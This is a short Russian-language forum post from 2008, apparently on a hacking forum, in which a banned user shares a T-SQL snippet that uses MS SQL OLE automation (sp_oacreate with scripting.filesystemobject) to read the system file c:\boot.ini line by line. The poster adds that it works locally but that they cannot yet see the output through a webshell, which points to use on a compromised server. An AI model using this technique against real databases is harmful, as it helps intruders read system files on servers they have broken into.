
12.11.2008, 11:27
|
|
Banned
Регистрация: 07.08.2008
Сообщений: 6
Провел на форуме: 13367
Репутация:
-2
|
|
Смотрим файл boot.ini
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
-----------------------------
и итак у себя норм показывает но там с вебшелла результаты не могу посмотреть пока
|
|
|